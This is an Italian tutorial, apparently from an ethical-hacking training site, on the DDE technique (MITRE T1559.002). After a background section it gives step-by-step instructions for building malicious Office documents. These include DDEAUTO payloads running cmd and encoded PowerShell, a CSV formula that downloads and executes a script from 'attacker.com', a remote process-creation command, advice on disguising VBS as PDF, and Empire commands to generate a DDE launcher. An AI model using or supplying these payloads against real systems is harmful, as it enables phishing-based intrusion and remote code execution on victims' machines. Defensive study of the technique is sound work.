Scambio Dinamico di Dati: Dynamic Data Exchange (T1559.002)

La tecnica Dynamic Data Exchange rappresenta un protocollo client-server di Windows che permette la comunicazione inter-processo tra applicazioni, sfruttato dagli avversari per eseguire comandi arbitrari. Questo meccanismo, originariamente progettato per collegare dati tra documenti Office, consente transazioni autonome di stringhe, notifiche di cambiamento dati e richieste di esecuzione comandi.

La tecnica si manifesta nella tattica TA0002 (Execution), permettendo agli attaccanti di eseguire codice malevolo attraverso documenti Office apparentemente innocui. Nonostante sia stata superata dal Component Object Model, questa funzionalità rimane attiva in Windows 10 e Microsoft Office 2016 attraverso specifiche chiavi di registro.

L'impatto è significativo: 11 gruppi APT documentati hanno utilizzato questa tecnica, tra cui APT28, FIN7 e Sidewinder. 8 famiglie di malware la sfruttano attivamente, inclusi RTM, POWERSTATS e GravityRAT. La campagna Operation Sharpshooter ha dimostrato l'efficacia di questo vettore contro obiettivi nel settore nucleare, difesa ed energia in Germania, Turchia, Regno Unito e Stati Uniti.

Per comprendere il funzionamento del DDE, iniziamo creando un documento Word malevolo. Il payload si inserisce attraverso la funzione campo di Word utilizzando la sintassi:

{DDEAUTO c:\windows\system32\cmd.exe "/k calc.exe"}

Questo comando avvia la calcolatrice come prova di concetto. Per payload più sofisticati, sostituisci calc.exe con PowerShell encoded:

{DDEAUTO c:\windows\system32\cmd.exe "/k powershell -e [BASE64_ENCODED_PAYLOAD]"}

La tecnica funziona anche in Excel attraverso formule. Crea un file CSV con questa riga: =cmd|'/c powershell.exe -w hidden IEX (New-Object Net.WebClient).DownloadString("http://attacker.com/payload.ps1")'!A1

Quando la vittima apre il CSV in Excel, il comando viene eseguito dopo aver bypassato l'avviso di sicurezza. Per testare l'esecuzione remota via DCOM, utilizza questo comando PowerShell dall'attaccante:

Invoke-CimMethod -ComputerName TARGET -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine="cmd.exe /c [COMANDO]"}

Cobalt Group ha dimostrato l'efficacia di documenti OLE compound contenenti oggetti malevoli. Per replicare questa tecnica, incorpora un oggetto Package in Word che esegue script VBS mascherati da documenti PDF. L'oggetto si attiva al doppio click della vittima.

Nel contesto di phishing avanzato, TA505 ha combinato DDE con tecniche di social engineering. I documenti sembravano fatture o comunicazioni aziendali legittime, aumentando drasticamente il tasso di esecuzione.

Per automatizzare la generazione di documenti DDE malevoli, strumenti come Empire e Metasploit includono moduli specifici. Il comando Empire per generare un launcher DDE:

uselistener http usestager windows/launcher_bat generate

Questo produce un payload che può essere inserito nel campo DDE del documento.

Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo